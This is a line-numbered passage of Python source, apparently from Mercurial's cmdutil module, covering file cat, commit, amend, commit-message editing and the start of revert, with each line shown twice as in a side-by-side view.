2849 data = repo.wwritedata(path, data)
2849 data = repo.wwritedata(path, data)
2850 fm.startitem()
2850 fm.startitem()
2851 fm.write('data', '%s', data)
2851 fm.write('data', '%s', data)
2852 fm.data(abspath=path, path=matcher.rel(path))
2852 fm.data(abspath=path, path=matcher.rel(path))
2853
2853
2854 # Automation often uses hg cat on single files, so special case it
2854 # Automation often uses hg cat on single files, so special case it
2855 # for performance to avoid the cost of parsing the manifest.
2855 # for performance to avoid the cost of parsing the manifest.
2856 if len(matcher.files()) == 1 and not matcher.anypats():
2856 if len(matcher.files()) == 1 and not matcher.anypats():
2857 file = matcher.files()[0]
2857 file = matcher.files()[0]
2858 mfl = repo.manifestlog
2858 mfl = repo.manifestlog
2859 mfnode = ctx.manifestnode()
2859 mfnode = ctx.manifestnode()
2860 try:
2860 try:
2861 if mfnode and mfl[mfnode].find(file)[0]:
2861 if mfnode and mfl[mfnode].find(file)[0]:
2862 write(file)
2862 write(file)
2863 return 0
2863 return 0
2864 except KeyError:
2864 except KeyError:
2865 pass
2865 pass
2866
2866
2867 for abs in ctx.walk(matcher):
2867 for abs in ctx.walk(matcher):
2868 write(abs)
2868 write(abs)
2869 err = 0
2869 err = 0
2870
2870
2871 for subpath in sorted(ctx.substate):
2871 for subpath in sorted(ctx.substate):
2872 sub = ctx.sub(subpath)
2872 sub = ctx.sub(subpath)
2873 try:
2873 try:
2874 submatch = matchmod.subdirmatcher(subpath, matcher)
2874 submatch = matchmod.subdirmatcher(subpath, matcher)
2875
2875
2876 if not sub.cat(submatch, basefm, fntemplate,
2876 if not sub.cat(submatch, basefm, fntemplate,
2877 os.path.join(prefix, sub._path), **opts):
2877 os.path.join(prefix, sub._path), **opts):
2878 err = 0
2878 err = 0
2879 except error.RepoLookupError:
2879 except error.RepoLookupError:
2880 ui.status(_("skipping missing subrepository: %s\n")
2880 ui.status(_("skipping missing subrepository: %s\n")
2881 % os.path.join(prefix, subpath))
2881 % os.path.join(prefix, subpath))
2882
2882
2883 return err
2883 return err
2884
2884
2885 def commit(ui, repo, commitfunc, pats, opts):
2885 def commit(ui, repo, commitfunc, pats, opts):
2886 '''commit the specified files or all outstanding changes'''
2886 '''commit the specified files or all outstanding changes'''
2887 date = opts.get('date')
2887 date = opts.get('date')
2888 if date:
2888 if date:
2889 opts['date'] = util.parsedate(date)
2889 opts['date'] = util.parsedate(date)
2890 message = logmessage(ui, opts)
2890 message = logmessage(ui, opts)
2891 matcher = scmutil.match(repo[None], pats, opts)
2891 matcher = scmutil.match(repo[None], pats, opts)
2892
2892
2893 dsguard = None
2893 dsguard = None
2894 # extract addremove carefully -- this function can be called from a command
2894 # extract addremove carefully -- this function can be called from a command
2895 # that doesn't support addremove
2895 # that doesn't support addremove
2896 try:
2896 try:
2897 if opts.get('addremove'):
2897 if opts.get('addremove'):
2898 dsguard = dirstateguard.dirstateguard(repo, 'commit')
2898 dsguard = dirstateguard.dirstateguard(repo, 'commit')
2899 if scmutil.addremove(repo, matcher, "", opts) != 0:
2899 if scmutil.addremove(repo, matcher, "", opts) != 0:
2900 raise error.Abort(
2900 raise error.Abort(
2901 _("failed to mark all new/missing files as added/removed"))
2901 _("failed to mark all new/missing files as added/removed"))
2902
2902
2903 r = commitfunc(ui, repo, message, matcher, opts)
2903 r = commitfunc(ui, repo, message, matcher, opts)
2904 if dsguard:
2904 if dsguard:
2905 dsguard.close()
2905 dsguard.close()
2906 return r
2906 return r
2907 finally:
2907 finally:
2908 if dsguard:
2908 if dsguard:
2909 dsguard.release()
2909 dsguard.release()
2910
2910
2911 def samefile(f, ctx1, ctx2):
2911 def samefile(f, ctx1, ctx2):
2912 if f in ctx1.manifest():
2912 if f in ctx1.manifest():
2913 a = ctx1.filectx(f)
2913 a = ctx1.filectx(f)
2914 if f in ctx2.manifest():
2914 if f in ctx2.manifest():
2915 b = ctx2.filectx(f)
2915 b = ctx2.filectx(f)
2916 return (not a.cmp(b)
2916 return (not a.cmp(b)
2917 and a.flags() == b.flags())
2917 and a.flags() == b.flags())
2918 else:
2918 else:
2919 return False
2919 return False
2920 else:
2920 else:
2921 return f not in ctx2.manifest()
2921 return f not in ctx2.manifest()
2922
2922
2923 def amend(ui, repo, commitfunc, old, extra, pats, opts):
2923 def amend(ui, repo, commitfunc, old, extra, pats, opts):
2924 # avoid cycle context -> subrepo -> cmdutil
2924 # avoid cycle context -> subrepo -> cmdutil
2925 from . import context
2925 from . import context
2926
2926
2927 # amend will reuse the existing user if not specified, but the obsolete
2927 # amend will reuse the existing user if not specified, but the obsolete
2928 # marker creation requires that the current user's name is specified.
2928 # marker creation requires that the current user's name is specified.
2929 if obsolete.isenabled(repo, obsolete.createmarkersopt):
2929 if obsolete.isenabled(repo, obsolete.createmarkersopt):
2930 ui.username() # raise exception if username not set
2930 ui.username() # raise exception if username not set
2931
2931
2932 ui.note(_('amending changeset %s\n') % old)
2932 ui.note(_('amending changeset %s\n') % old)
2933 base = old.p1()
2933 base = old.p1()
2934
2934
2935 newid = None
2935 newid = None
2936 with repo.wlock(), repo.lock(), repo.transaction('amend'):
2936 with repo.wlock(), repo.lock(), repo.transaction('amend'):
2937 # See if we got a message from -m or -l, if not, open the editor
2937 # See if we got a message from -m or -l, if not, open the editor
2938 # with the message of the changeset to amend
2938 # with the message of the changeset to amend
2939 message = logmessage(ui, opts)
2939 message = logmessage(ui, opts)
2940 # ensure logfile does not conflict with later enforcement of the
2940 # ensure logfile does not conflict with later enforcement of the
2941 # message. potential logfile content has been processed by
2941 # message. potential logfile content has been processed by
2942 # `logmessage` anyway.
2942 # `logmessage` anyway.
2943 opts.pop('logfile')
2943 opts.pop('logfile')
2944 # First, do a regular commit to record all changes in the working
2944 # First, do a regular commit to record all changes in the working
2945 # directory (if there are any)
2945 # directory (if there are any)
2946 ui.callhooks = False
2946 ui.callhooks = False
2947 activebookmark = repo._bookmarks.active
2947 activebookmark = repo._bookmarks.active
2948 try:
2948 try:
2949 repo._bookmarks.active = None
2949 repo._bookmarks.active = None
2950 opts['message'] = 'temporary amend commit for %s' % old
2950 opts['message'] = 'temporary amend commit for %s' % old
2951 node = commit(ui, repo, commitfunc, pats, opts)
2951 node = commit(ui, repo, commitfunc, pats, opts)
2952 finally:
2952 finally:
2953 repo._bookmarks.active = activebookmark
2953 repo._bookmarks.active = activebookmark
2954 ui.callhooks = True
2954 ui.callhooks = True
2955 ctx = repo[node]
2955 ctx = repo[node]
2956
2956
2957 # Participating changesets:
2957 # Participating changesets:
2958 #
2958 #
2959 # node/ctx o - new (intermediate) commit that contains changes
2959 # node/ctx o - new (intermediate) commit that contains changes
2960 # | from working dir to go into amending commit
2960 # | from working dir to go into amending commit
2961 # | (or a workingctx if there were no changes)
2961 # | (or a workingctx if there were no changes)
2962 # |
2962 # |
2963 # old o - changeset to amend
2963 # old o - changeset to amend
2964 # |
2964 # |
2965 # base o - parent of amending changeset
2965 # base o - parent of amending changeset
2966
2966
2967 # Update extra dict from amended commit (e.g. to preserve graft
2967 # Update extra dict from amended commit (e.g. to preserve graft
2968 # source)
2968 # source)
2969 extra.update(old.extra())
2969 extra.update(old.extra())
2970
2970
2971 # Also update it from the intermediate commit or from the wctx
2971 # Also update it from the intermediate commit or from the wctx
2972 extra.update(ctx.extra())
2972 extra.update(ctx.extra())
2973
2973
2974 if len(old.parents()) > 1:
2974 if len(old.parents()) > 1:
2975 # ctx.files() isn't reliable for merges, so fall back to the
2975 # ctx.files() isn't reliable for merges, so fall back to the
2976 # slower repo.status() method
2976 # slower repo.status() method
2977 files = set([fn for st in repo.status(base, old)[:3]
2977 files = set([fn for st in repo.status(base, old)[:3]
2978 for fn in st])
2978 for fn in st])
2979 else:
2979 else:
2980 files = set(old.files())
2980 files = set(old.files())
2981
2981
2982 # Second, we use either the commit we just did, or if there were no
2982 # Second, we use either the commit we just did, or if there were no
2983 # changes the parent of the working directory as the version of the
2983 # changes the parent of the working directory as the version of the
2984 # files in the final amend commit
2984 # files in the final amend commit
2985 if node:
2985 if node:
2986 ui.note(_('copying changeset %s to %s\n') % (ctx, base))
2986 ui.note(_('copying changeset %s to %s\n') % (ctx, base))
2987
2987
2988 user = ctx.user()
2988 user = ctx.user()
2989 date = ctx.date()
2989 date = ctx.date()
2990 # Recompute copies (avoid recording a -> b -> a)
2990 # Recompute copies (avoid recording a -> b -> a)
2991 copied = copies.pathcopies(base, ctx)
2991 copied = copies.pathcopies(base, ctx)
2992 if old.p2:
2992 if old.p2:
2993 copied.update(copies.pathcopies(old.p2(), ctx))
2993 copied.update(copies.pathcopies(old.p2(), ctx))
2994
2994
2995 # Prune files which were reverted by the updates: if old
2995 # Prune files which were reverted by the updates: if old
2996 # introduced file X and our intermediate commit, node,
2996 # introduced file X and our intermediate commit, node,
2997 # renamed that file, then those two files are the same and
2997 # renamed that file, then those two files are the same and
2998 # we can discard X from our list of files. Likewise if X
2998 # we can discard X from our list of files. Likewise if X
2999 # was deleted, it's no longer relevant
2999 # was deleted, it's no longer relevant
3000 files.update(ctx.files())
3000 files.update(ctx.files())
3001 files = [f for f in files if not samefile(f, ctx, base)]
3001 files = [f for f in files if not samefile(f, ctx, base)]
3002
3002
3003 def filectxfn(repo, ctx_, path):
3003 def filectxfn(repo, ctx_, path):
3004 try:
3004 try:
3005 fctx = ctx[path]
3005 fctx = ctx[path]
3006 flags = fctx.flags()
3006 flags = fctx.flags()
3007 mctx = context.memfilectx(repo,
3007 mctx = context.memfilectx(repo,
3008 fctx.path(), fctx.data(),
3008 fctx.path(), fctx.data(),
3009 islink='l' in flags,
3009 islink='l' in flags,
3010 isexec='x' in flags,
3010 isexec='x' in flags,
3011 copied=copied.get(path))
3011 copied=copied.get(path))
3012 return mctx
3012 return mctx
3013 except KeyError:
3013 except KeyError:
3014 return None
3014 return None
3015 else:
3015 else:
3016 ui.note(_('copying changeset %s to %s\n') % (old, base))
3016 ui.note(_('copying changeset %s to %s\n') % (old, base))
3017
3017
3018 # Use version of files as in the old cset
3018 # Use version of files as in the old cset
3019 def filectxfn(repo, ctx_, path):
3019 def filectxfn(repo, ctx_, path):
3020 try:
3020 try:
3021 return old.filectx(path)
3021 return old.filectx(path)
3022 except KeyError:
3022 except KeyError:
3023 return None
3023 return None
3024
3024
3025 user = opts.get('user') or old.user()
3025 user = opts.get('user') or old.user()
3026 date = opts.get('date') or old.date()
3026 date = opts.get('date') or old.date()
3027 editform = mergeeditform(old, 'commit.amend')
3027 editform = mergeeditform(old, 'commit.amend')
3028 editor = getcommiteditor(editform=editform,
3028 editor = getcommiteditor(editform=editform,
3029 **pycompat.strkwargs(opts))
3029 **pycompat.strkwargs(opts))
3030 if not message:
3030 if not message:
3031 editor = getcommiteditor(edit=True, editform=editform)
3031 editor = getcommiteditor(edit=True, editform=editform)
3032 message = old.description()
3032 message = old.description()
3033
3033
3034 pureextra = extra.copy()
3034 pureextra = extra.copy()
3035 extra['amend_source'] = old.hex()
3035 extra['amend_source'] = old.hex()
3036
3036
3037 new = context.memctx(repo,
3037 new = context.memctx(repo,
3038 parents=[base.node(), old.p2().node()],
3038 parents=[base.node(), old.p2().node()],
3039 text=message,
3039 text=message,
3040 files=files,
3040 files=files,
3041 filectxfn=filectxfn,
3041 filectxfn=filectxfn,
3042 user=user,
3042 user=user,
3043 date=date,
3043 date=date,
3044 extra=extra,
3044 extra=extra,
3045 editor=editor)
3045 editor=editor)
3046
3046
3047 newdesc = changelog.stripdesc(new.description())
3047 newdesc = changelog.stripdesc(new.description())
3048 if ((not node)
3048 if ((not node)
3049 and newdesc == old.description()
3049 and newdesc == old.description()
3050 and user == old.user()
3050 and user == old.user()
3051 and date == old.date()
3051 and date == old.date()
3052 and pureextra == old.extra()):
3052 and pureextra == old.extra()):
3053 # nothing changed. continuing here would create a new node
3053 # nothing changed. continuing here would create a new node
3054 # anyway because of the amend_source noise.
3054 # anyway because of the amend_source noise.
3055 #
3055 #
3056 # This not what we expect from amend.
3056 # This not what we expect from amend.
3057 return old.node()
3057 return old.node()
3058
3058
3059 ph = repo.ui.config('phases', 'new-commit', phases.draft)
3059 ph = repo.ui.config('phases', 'new-commit', phases.draft)
3060 try:
3060 try:
3061 if opts.get('secret'):
3061 if opts.get('secret'):
3062 commitphase = 'secret'
3062 commitphase = 'secret'
3063 else:
3063 else:
3064 commitphase = old.phase()
3064 commitphase = old.phase()
3065 repo.ui.setconfig('phases', 'new-commit', commitphase, 'amend')
3065 repo.ui.setconfig('phases', 'new-commit', commitphase, 'amend')
3066 newid = repo.commitctx(new)
3066 newid = repo.commitctx(new)
3067 finally:
3067 finally:
3068 repo.ui.setconfig('phases', 'new-commit', ph, 'amend')
3068 repo.ui.setconfig('phases', 'new-commit', ph, 'amend')
3069 if newid != old.node():
3069 if newid != old.node():
3070 # Reroute the working copy parent to the new changeset
3070 # Reroute the working copy parent to the new changeset
3071 repo.setparents(newid, nullid)
3071 repo.setparents(newid, nullid)
3072 mapping = {old.node(): (newid,)}
3072 mapping = {old.node(): (newid,)}
3073 if node:
3073 if node:
3074 mapping[node] = ()
3074 mapping[node] = ()
3075 scmutil.cleanupnodes(repo, mapping, 'amend')
3075 scmutil.cleanupnodes(repo, mapping, 'amend')
3076 return newid
3076 return newid
3077
3077
3078 def commiteditor(repo, ctx, subs, editform=''):
3078 def commiteditor(repo, ctx, subs, editform=''):
3079 if ctx.description():
3079 if ctx.description():
3080 return ctx.description()
3080 return ctx.description()
3081 return commitforceeditor(repo, ctx, subs, editform=editform,
3081 return commitforceeditor(repo, ctx, subs, editform=editform,
3082 unchangedmessagedetection=True)
3082 unchangedmessagedetection=True)
3083
3083
3084 def commitforceeditor(repo, ctx, subs, finishdesc=None, extramsg=None,
3084 def commitforceeditor(repo, ctx, subs, finishdesc=None, extramsg=None,
3085 editform='', unchangedmessagedetection=False):
3085 editform='', unchangedmessagedetection=False):
3086 if not extramsg:
3086 if not extramsg:
3087 extramsg = _("Leave message empty to abort commit.")
3087 extramsg = _("Leave message empty to abort commit.")
3088
3088
3089 forms = [e for e in editform.split('.') if e]
3089 forms = [e for e in editform.split('.') if e]
3090 forms.insert(0, 'changeset')
3090 forms.insert(0, 'changeset')
3091 templatetext = None
3091 templatetext = None
3092 while forms:
3092 while forms:
3093 ref = '.'.join(forms)
3093 ref = '.'.join(forms)
3094 if repo.ui.config('committemplate', ref):
3094 if repo.ui.config('committemplate', ref):
3095 templatetext = committext = buildcommittemplate(
3095 templatetext = committext = buildcommittemplate(
3096 repo, ctx, subs, extramsg, ref)
3096 repo, ctx, subs, extramsg, ref)
3097 break
3097 break
3098 forms.pop()
3098 forms.pop()
3099 else:
3099 else:
3100 committext = buildcommittext(repo, ctx, subs, extramsg)
3100 committext = buildcommittext(repo, ctx, subs, extramsg)
3101
3101
3102 # run editor in the repository root
3102 # run editor in the repository root
3103 olddir = pycompat.getcwd()
3103 olddir = pycompat.getcwd()
3104 os.chdir(repo.root)
3104 os.chdir(repo.root)
3105
3105
3106 # make in-memory changes visible to external process
3106 # make in-memory changes visible to external process
3107 tr = repo.currenttransaction()
3107 tr = repo.currenttransaction()
3108 repo.dirstate.write(tr)
3108 repo.dirstate.write(tr)
3109 pending = tr and tr.writepending() and repo.root
3109 pending = tr and tr.writepending() and repo.root
3110
3110
3111 editortext = repo.ui.edit(committext, ctx.user(), ctx.extra(),
3111 editortext = repo.ui.edit(committext, ctx.user(), ctx.extra(),
3112 editform=editform, pending=pending,
3112 editform=editform, pending=pending,
3113 repopath=repo.path)
3113 repopath=repo.path)
3114 text = editortext
3114 text = editortext
3115
3115
3116 # strip away anything below this special string (used for editors that want
3116 # strip away anything below this special string (used for editors that want
3117 # to display the diff)
3117 # to display the diff)
3118 stripbelow = re.search(_linebelow, text, flags=re.MULTILINE)
3118 stripbelow = re.search(_linebelow, text, flags=re.MULTILINE)
3119 if stripbelow:
3119 if stripbelow:
3120 text = text[:stripbelow.start()]
3120 text = text[:stripbelow.start()]
3121
3121
3122 text = re.sub("(?m)^HG:.*(\n|$)", "", text)
3122 text = re.sub("(?m)^HG:.*(\n|$)", "", text)
3123 os.chdir(olddir)
3123 os.chdir(olddir)
3124
3124
3125 if finishdesc:
3125 if finishdesc:
3126 text = finishdesc(text)
3126 text = finishdesc(text)
3127 if not text.strip():
3127 if not text.strip():
3128 raise error.Abort(_("empty commit message"))
3128 raise error.Abort(_("empty commit message"))
3129 if unchangedmessagedetection and editortext == templatetext:
3129 if unchangedmessagedetection and editortext == templatetext:
3130 raise error.Abort(_("commit message unchanged"))
3130 raise error.Abort(_("commit message unchanged"))
3131
3131
3132 return text
3132 return text
3133
3133
3134 def buildcommittemplate(repo, ctx, subs, extramsg, ref):
3134 def buildcommittemplate(repo, ctx, subs, extramsg, ref):
3135 ui = repo.ui
3135 ui = repo.ui
3136 spec = formatter.templatespec(ref, None, None)
3136 spec = formatter.templatespec(ref, None, None)
3137 t = changeset_templater(ui, repo, spec, None, {}, False)
3137 t = changeset_templater(ui, repo, spec, None, {}, False)
3138 t.t.cache.update((k, templater.unquotestring(v))
3138 t.t.cache.update((k, templater.unquotestring(v))
3139 for k, v in repo.ui.configitems('committemplate'))
3139 for k, v in repo.ui.configitems('committemplate'))
3140
3140
3141 if not extramsg:
3141 if not extramsg:
3142 extramsg = '' # ensure that extramsg is string
3142 extramsg = '' # ensure that extramsg is string
3143
3143
3144 ui.pushbuffer()
3144 ui.pushbuffer()
3145 t.show(ctx, extramsg=extramsg)
3145 t.show(ctx, extramsg=extramsg)
3146 return ui.popbuffer()
3146 return ui.popbuffer()
3147
3147
3148 def hgprefix(msg):
3148 def hgprefix(msg):
3149 return "\n".join(["HG: %s" % a for a in msg.split("\n") if a])
3149 return "\n".join(["HG: %s" % a for a in msg.split("\n") if a])
3150
3150
3151 def buildcommittext(repo, ctx, subs, extramsg):
3151 def buildcommittext(repo, ctx, subs, extramsg):
3152 edittext = []
3152 edittext = []
3153 modified, added, removed = ctx.modified(), ctx.added(), ctx.removed()
3153 modified, added, removed = ctx.modified(), ctx.added(), ctx.removed()
3154 if ctx.description():
3154 if ctx.description():
3155 edittext.append(ctx.description())
3155 edittext.append(ctx.description())
3156 edittext.append("")
3156 edittext.append("")
3157 edittext.append("") # Empty line between message and comments.
3157 edittext.append("") # Empty line between message and comments.
3158 edittext.append(hgprefix(_("Enter commit message."
3158 edittext.append(hgprefix(_("Enter commit message."
3159 " Lines beginning with 'HG:' are removed.")))
3159 " Lines beginning with 'HG:' are removed.")))
3160 edittext.append(hgprefix(extramsg))
3160 edittext.append(hgprefix(extramsg))
3161 edittext.append("HG: --")
3161 edittext.append("HG: --")
3162 edittext.append(hgprefix(_("user: %s") % ctx.user()))
3162 edittext.append(hgprefix(_("user: %s") % ctx.user()))
3163 if ctx.p2():
3163 if ctx.p2():
3164 edittext.append(hgprefix(_("branch merge")))
3164 edittext.append(hgprefix(_("branch merge")))
3165 if ctx.branch():
3165 if ctx.branch():
3166 edittext.append(hgprefix(_("branch '%s'") % ctx.branch()))
3166 edittext.append(hgprefix(_("branch '%s'") % ctx.branch()))
3167 if bookmarks.isactivewdirparent(repo):
3167 if bookmarks.isactivewdirparent(repo):
3168 edittext.append(hgprefix(_("bookmark '%s'") % repo._activebookmark))
3168 edittext.append(hgprefix(_("bookmark '%s'") % repo._activebookmark))
3169 edittext.extend([hgprefix(_("subrepo %s") % s) for s in subs])
3169 edittext.extend([hgprefix(_("subrepo %s") % s) for s in subs])
3170 edittext.extend([hgprefix(_("added %s") % f) for f in added])
3170 edittext.extend([hgprefix(_("added %s") % f) for f in added])
3171 edittext.extend([hgprefix(_("changed %s") % f) for f in modified])
3171 edittext.extend([hgprefix(_("changed %s") % f) for f in modified])
3172 edittext.extend([hgprefix(_("removed %s") % f) for f in removed])
3172 edittext.extend([hgprefix(_("removed %s") % f) for f in removed])
3173 if not added and not modified and not removed:
3173 if not added and not modified and not removed:
3174 edittext.append(hgprefix(_("no files changed")))
3174 edittext.append(hgprefix(_("no files changed")))
3175 edittext.append("")
3175 edittext.append("")
3176
3176
3177 return "\n".join(edittext)
3177 return "\n".join(edittext)
3178
3178
3179 def commitstatus(repo, node, branch, bheads=None, opts=None):
3179 def commitstatus(repo, node, branch, bheads=None, opts=None):
3180 if opts is None:
3180 if opts is None:
3181 opts = {}
3181 opts = {}
3182 ctx = repo[node]
3182 ctx = repo[node]
3183 parents = ctx.parents()
3183 parents = ctx.parents()
3184
3184
3185 if (not opts.get('amend') and bheads and node not in bheads and not
3185 if (not opts.get('amend') and bheads and node not in bheads and not
3186 [x for x in parents if x.node() in bheads and x.branch() == branch]):
3186 [x for x in parents if x.node() in bheads and x.branch() == branch]):
3187 repo.ui.status(_('created new head\n'))
3187 repo.ui.status(_('created new head\n'))
3188 # The message is not printed for initial roots. For the other
3188 # The message is not printed for initial roots. For the other
3189 # changesets, it is printed in the following situations:
3189 # changesets, it is printed in the following situations:
3190 #
3190 #
3191 # Par column: for the 2 parents with ...
3191 # Par column: for the 2 parents with ...
3192 # N: null or no parent
3192 # N: null or no parent
3193 # B: parent is on another named branch
3193 # B: parent is on another named branch
3194 # C: parent is a regular non head changeset
3194 # C: parent is a regular non head changeset
3195 # H: parent was a branch head of the current branch
3195 # H: parent was a branch head of the current branch
3196 # Msg column: whether we print "created new head" message
3196 # Msg column: whether we print "created new head" message
3197 # In the following, it is assumed that there already exists some
3197 # In the following, it is assumed that there already exists some
3198 # initial branch heads of the current branch, otherwise nothing is
3198 # initial branch heads of the current branch, otherwise nothing is
3199 # printed anyway.
3199 # printed anyway.
3200 #
3200 #
3201 # Par Msg Comment
3201 # Par Msg Comment
3202 # N N y additional topo root
3202 # N N y additional topo root
3203 #
3203 #
3204 # B N y additional branch root
3204 # B N y additional branch root
3205 # C N y additional topo head
3205 # C N y additional topo head
3206 # H N n usual case
3206 # H N n usual case
3207 #
3207 #
3208 # B B y weird additional branch root
3208 # B B y weird additional branch root
3209 # C B y branch merge
3209 # C B y branch merge
3210 # H B n merge with named branch
3210 # H B n merge with named branch
3211 #
3211 #
3212 # C C y additional head from merge
3212 # C C y additional head from merge
3213 # C H n merge with a head
3213 # C H n merge with a head
3214 #
3214 #
3215 # H H n head merge: head count decreases
3215 # H H n head merge: head count decreases
3216
3216
3217 if not opts.get('close_branch'):
3217 if not opts.get('close_branch'):
3218 for r in parents:
3218 for r in parents:
3219 if r.closesbranch() and r.branch() == branch:
3219 if r.closesbranch() and r.branch() == branch:
3220 repo.ui.status(_('reopening closed branch head %d\n') % r)
3220 repo.ui.status(_('reopening closed branch head %d\n') % r)
3221
3221
3222 if repo.ui.debugflag:
3222 if repo.ui.debugflag:
3223 repo.ui.write(_('committed changeset %d:%s\n') % (int(ctx), ctx.hex()))
3223 repo.ui.write(_('committed changeset %d:%s\n') % (int(ctx), ctx.hex()))
3224 elif repo.ui.verbose:
3224 elif repo.ui.verbose:
3225 repo.ui.write(_('committed changeset %d:%s\n') % (int(ctx), ctx))
3225 repo.ui.write(_('committed changeset %d:%s\n') % (int(ctx), ctx))
3226
3226
3227 def postcommitstatus(repo, pats, opts):
3227 def postcommitstatus(repo, pats, opts):
3228 return repo.status(match=scmutil.match(repo[None], pats, opts))
3228 return repo.status(match=scmutil.match(repo[None], pats, opts))
3229
3229
3230 def revert(ui, repo, ctx, parents, *pats, **opts):
3230 def revert(ui, repo, ctx, parents, *pats, **opts):
3231 parent, p2 = parents
3231 parent, p2 = parents
3232 node = ctx.node()
3232 node = ctx.node()
3233
3233
3234 mf = ctx.manifest()
3234 mf = ctx.manifest()
3235 if node == p2:
3235 if node == p2:
3236 parent = p2
3236 parent = p2
3237
3237
3238 # need all matching names in dirstate and manifest of target rev,
3238 # need all matching names in dirstate and manifest of target rev,
3239 # so have to walk both. do not print errors if files exist in one
3239 # so have to walk both. do not print errors if files exist in one
3240 # but not other. in both cases, filesets should be evaluated against
3240 # but not other. in both cases, filesets should be evaluated against
3241 # workingctx to get consistent result (issue4497). this means 'set:**'
3241 # workingctx to get consistent result (issue4497). this means 'set:**'
3242 # cannot be used to select missing files from target rev.
3242 # cannot be used to select missing files from target rev.
3243
3243
3244 # `names` is a mapping for all elements in working copy and target revision
3244 # `names` is a mapping for all elements in working copy and target revision
3245 # The mapping is in the form:
3245 # The mapping is in the form:
3246 # <asb path in repo> -> (<path from CWD>, <exactly specified by matcher?>)
3246 # <asb path in repo> -> (<path from CWD>, <exactly specified by matcher?>)
3247 names = {}
3247 names = {}
3248
3248
3249 with repo.wlock():
3249 with repo.wlock():
3250 ## filling of the `names` mapping
3250 ## filling of the `names` mapping
3251 # walk dirstate to fill `names`
3251 # walk dirstate to fill `names`
3252
3252
3253 interactive = opts.get('interactive', False)
3253 interactive = opts.get('interactive', False)
3254 wctx = repo[None]
3254 wctx = repo[None]
3255 m = scmutil.match(wctx, pats, opts)
3255 m = scmutil.match(wctx, pats, opts)
3256
3256
3257 # we'll need this later
3257 # we'll need this later
3258 targetsubs = sorted(s for s in wctx.substate if m(s))
3258 targetsubs = sorted(s for s in wctx.substate if m(s))
3259
3259
3260 if not m.always():
3260 if not m.always():
3261 matcher = matchmod.badmatch(m, lambda x, y: False)
3261 matcher = matchmod.badmatch(m, lambda x, y: False)
3262 for abs in wctx.walk(matcher):
3262 for abs in wctx.walk(matcher):
3263 names[abs] = m.rel(abs), m.exact(abs)
3263 names[abs] = m.rel(abs), m.exact(abs)
3264
3264
3265 # walk target manifest to fill `names`
3265 # walk target manifest to fill `names`
3266
3266
3267 def badfn(path, msg):
3267 def badfn(path, msg):
3268 if path in names:
3268 if path in names:
3269 return
3269 return
3270 if path in ctx.substate:
3270 if path in ctx.substate:
3271 return
3271 return
3272 path_ = path + '/'
3272 path_ = path + '/'
3273 for f in names:
3273 for f in names:
3274 if f.startswith(path_):
3274 if f.startswith(path_):
3275 return
3275 return
3276 ui.warn("%s: %s\n" % (m.rel(path), msg))
3276 ui.warn("%s: %s\n" % (m.rel(path), msg))
3277
3277
3278 for abs in ctx.walk(matchmod.badmatch(m, badfn)):
3278 for abs in ctx.walk(matchmod.badmatch(m, badfn)):
3279 if abs not in names:
3279 if abs not in names:
3280 names[abs] = m.rel(abs), m.exact(abs)
3280 names[abs] = m.rel(abs), m.exact(abs)
3281
3281
3282 # Find status of all file in `names`.
3282 # Find status of all file in `names`.
3283 m = scmutil.matchfiles(repo, names)
3283 m = scmutil.matchfiles(repo, names)
3284
3284
3285 changes = repo.status(node1=node, match=m,
3285 changes = repo.status(node1=node, match=m,
3286 unknown=True, ignored=True, clean=True)
3286 unknown=True, ignored=True, clean=True)
3287 else:
3287 else:
3288 changes = repo.status(node1=node, match=m)
3288 changes = repo.status(node1=node, match=m)
3289 for kind in changes:
3289 for kind in changes:
3290 for abs in kind:
3290 for abs in kind:
3291 names[abs] = m.rel(abs), m.exact(abs)
3291 names[abs] = m.rel(abs), m.exact(abs)
3292
3292
3293 m = scmutil.matchfiles(repo, names)
3293 m = scmutil.matchfiles(repo, names)
3294
3294
3295 modified = set(changes.modified)
3295 modified = set(changes.modified)
3296 added = set(changes.added)
3296 added = set(changes.added)
3297 removed = set(changes.removed)
3297 removed = set(changes.removed)
3298 _deleted = set(changes.deleted)
3298 _deleted = set(changes.deleted)
3299 unknown = set(changes.unknown)
3299 unknown = set(changes.unknown)
3300 unknown.update(changes.ignored)
3300 unknown.update(changes.ignored)
3301 clean = set(changes.clean)
3301 clean = set(changes.clean)
3302 modadded = set()
3302 modadded = set()
3303
3303
3304 # We need to account for the state of the file in the dirstate,
3304 # We need to account for the state of the file in the dirstate,
3305 # even when we revert against something else than parent. This will
3305 # even when we revert against something else than parent. This will
3306 # slightly alter the behavior of revert (doing back up or not, delete
3306 # slightly alter the behavior of revert (doing back up or not, delete
3307 # or just forget etc).
3307 # or just forget etc).
3308 if parent == node:
3308 if parent == node:
3309 dsmodified = modified
3309 dsmodified = modified
3310 dsadded = added
3310 dsadded = added
3311 dsremoved = removed
3311 dsremoved = removed
3312 # store all local modifications, useful later for rename detection
3312 # store all local modifications, useful later for rename detection
3313 localchanges = dsmodified | dsadded
3313 localchanges = dsmodified | dsadded
3314 modified, added, removed = set(), set(), set()
3314 modified, added, removed = set(), set(), set()
3315 else:
3315 else:
3316 changes = repo.status(node1=parent, match=m)
3316 changes = repo.status(node1=parent, match=m)
3317 dsmodified = set(changes.modified)
3317 dsmodified = set(changes.modified)
3318 dsadded = set(changes.added)
3318 dsadded = set(changes.added)
3319 dsremoved = set(changes.removed)
3319 dsremoved = set(changes.removed)
3320 # store all local modifications, useful later for rename detection
3320 # store all local modifications, useful later for rename detection
3321 localchanges = dsmodified | dsadded
3321 localchanges = dsmodified | dsadded
3322
3322
3323 # only take into account for removes between wc and target
3323 # only take into account for removes between wc and target
3324 clean |= dsremoved - removed
3324 clean |= dsremoved - removed
3325 dsremoved &= removed
3325 dsremoved &= removed
3326 # distinct between dirstate remove and other
3326 # distinct between dirstate remove and other
3327 removed -= dsremoved
3327 removed -= dsremoved
3328
3328
3329 modadded = added & dsmodified
3329 modadded = added & dsmodified
3330 added -= modadded
3330 added -= modadded
3331
3331
3332 # tell newly modified apart.
3332 # tell newly modified apart.
3333 dsmodified &= modified
3333 dsmodified &= modified
3334 dsmodified |= modified & dsadded # dirstate added may need backup
3334 dsmodified |= modified & dsadded # dirstate added may need backup
3335 modified -= dsmodified
3335 modified -= dsmodified
3336
3336
3337 # We need to wait for some post-processing to update this set
3337 # We need to wait for some post-processing to update this set
3338 # before making the distinction. The dirstate will be used for
3338 # before making the distinction. The dirstate will be used for
3339 # that purpose.
3339 # that purpose.
3340 dsadded = added
3340 dsadded = added
3341
3341
3342 # in case of merge, files that are actually added can be reported as
3342 # in case of merge, files that are actually added can be reported as
3343 # modified, we need to post process the result
